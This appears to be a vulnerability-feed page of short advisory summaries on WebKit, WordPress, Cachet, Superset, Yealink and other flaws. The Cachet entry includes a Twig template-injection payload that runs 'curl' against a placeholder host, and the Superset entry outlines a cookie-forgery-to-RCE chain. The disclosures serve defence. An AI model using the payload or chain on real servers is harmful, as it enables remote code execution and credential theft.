#webkit

The Thumbnail Slider With Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Title field in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

Apple Security Advisory 10-10-2023-1 - iOS 16.7.1 and iPadOS 16.7.1 addresses buffer overflow and code execution vulnerabilities.

An issue in YeaLinkSIP-T19P-E2 v.53.84.0.15 allows a remote privileged attacker to execute arbitrary code via a crafted request the ping function of the diagnostic component.

Cross Site Scripting vulnerability in mooSocial 3.1.8 allows a remote attacker to obtain sensitive information via a crafted script to the q parameter in the Search function.

Zoo Management System version 1.0 suffers from a remote shell upload vulnerability. This version originally had a shell upload vulnerability discovered by D4rkP0w4r that leveraged the upload CV flow but this particular finding leverages the save_animal flow.

2023 Mount Carmel School version 6.4.1 suffers from a cross site scripting vulnerability.

### Summary A template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Within `/cachet/app/Http/Routes/ApiRoutes.php`, and attacker could control `template` input which is passed to `laravel's` dispatched handler `/cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php`. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution. This vulnerability does not exist within the [Twig](https://twig.symfony.com/) library itself, but exists during the process of the [Cachet](https://github.com/cachethq/cachet) processing of the data without any filtration. This has been patched in Cachet version 2.4. ### PoC 1. Log in as a default user (non-admin); 2. Create an incident with name `slug1` and with content: `{{ ['curl yourhost.com','']|sort('system') }}` or with any other ...

Apache Superset versions 2.0.0 and below utilize Flask with a known default secret key which is used to sign HTTP cookies. These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be set for that dashboard within Superset's database which will trigger the remote code execution. An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.

Debian Linux Security Advisory 5527-1 - Marcin Noga discovered that a specially crafted web page can abuse a vulnerability in the MediaRecorder API to cause memory corruption and potentially arbitrary code execution. Junsung Lee and Me Li discovered that processing web content may lead to arbitrary code execution. Bill Marczak and Maddie Stone discovered that processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Attackers could exploit these vulnerabilities in the Yifan YF325 to carry out a variety of attacks, in some cases gaining the ability to execute arbitrary shell commands on the targeted device.